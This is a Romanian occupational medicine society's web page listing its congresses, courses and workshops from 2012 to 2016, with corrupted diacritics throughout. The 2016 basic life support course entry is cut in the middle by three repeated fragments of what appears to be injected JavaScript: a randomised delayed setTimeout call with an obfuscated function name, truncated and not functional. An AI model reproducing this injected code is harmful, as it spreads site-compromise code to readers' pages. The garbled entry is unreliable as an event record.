Activitate

Societatea romana de medicina a muncii

www.srmedicina-muncii.ro

Congrese/ Conferin?e/ Cursuri/ Ateliere de lucru/ ?coli de var? organizate de S.R.M.M.

2016________________________________________________________

Congresul Na?ional de Medicina Muncii cu participare interna?ional?, Bucure?ti, 2016, Pre?edinte prof. dr. Eugenia Naghi – pre?edinte S.R.M.M.

Suportul de baz? al vie?ii la adult ?i utilizarea defibrilatorului automat/Adult basic life support andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout(#(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}and automated external defibrillation, Bucure?ti, 2016, – curs de prim ajutorsub coordonarea prof. dr. Eugenia Naghi – pre?edinte S.R.M.M. – curs sus?inut de un colectiv de medici primari medicin? de urgen?? ?i instructori-formatori de la Spitalul Clinic de Urgen?? Bucure?ti sub conducerea dr Bogdan Opri??, Medic ?ef UPU-SMURD, coordonator SMURD Bucure?ti.

?coala de var? European Union of Medical Specialists (EASOM), Timi?oara, 25-27.08.2016 – Pre?edinte prof. dr. Elena Ana P?uncu – vicepre?edinte S.R.M.M..

Curs  „ Formare de formatori” cod COR 242401 desf??urat în 4 serii: 3-6 octombrie 2016, Bucure?ti, 13-16 octombrie 2016, Bucure?ti, 20-23 octombrie 2016, Bucure?ti si 27-30 octombrie 2016, Cluj- Napoca.

Societatea Român? de Medicina Muncii- partener la al 24-lea Congres Na?ional al Societ??ii Române de Pneumologie, organizat în perioada 5-8 octombrie 2016, Poiana Bra?ov.

2015________________________________________________________

Conferin?a Na?ional? de Medicina Muncii cu participare interna?ional?, Arad, 2015, Pre?edinte ?ef lucr?ri, dr. Stelian Morariu;

Conferin?a Na?ional? de Medicina Muncii cu participare interna?ional?, Târgu Mure?, 2015 – Pre?edinte ?ef lucr?ri, dr. Hora?iu Moldovan;

Conferin?a Na?ional? de Medicina Muncii cu participare interna?ional?, Târgu Mure?, 2015 – Pre?edinte ?ef lucr?ri, dr. Hora?iu Moldovan.

2014________________________________________________________

Congresul Na?ional de Medicina Muncii cu participare interna?ional?, Târgu Mure?, 2014 – Pre?edinte ?ef lucr?ri, dr. Hora?iu Moldovan.

Tulburarile respitatorii in timpul somnului: clasificare, diagnostic, comorbiditati – Predeal, 25.09.2014 – Atelier de lucru – coordonator de program conf.dr.Agripina Ra?cu- vicepre?edinte S.R.M.M..

Ergonomie – prévention ergonomique en santé au travail, Sinaia, 16-17.10.2014 – conferin?? –  coordonator de program prof.dr.Eugenia Naghi- pre?edinte S.R.M.M..

2013________________________________________________________

Conferin?a Na?ional? de Medicina Muncii cu participare interna?ional?, Gala?i, 2013 – Pre?edinte conf. dr. Brându?a Constantin;

?coala de var? European Union of Medical Specialists (EASOM), Timi?oara, 2013 – Pre?edinte prof. dr. Elena Ana P?uncu – vicepre?edinte S.R.M.M..

Sindromul de apnee in somn, modul II, Bucure?ti, 06.06.2013 – curs – coordonator de program  conf.dr.Agripina Ra?cu- vicepre?edinte S.R.M.M..

2012________________________________________________________

Sindromul de apnee in somn, modul I, Bucure?ti, 28.12.2012 – curs – coordonator de program  conf.dr.Agripina Ra?cu- vicepre?edinte S.R.M.M..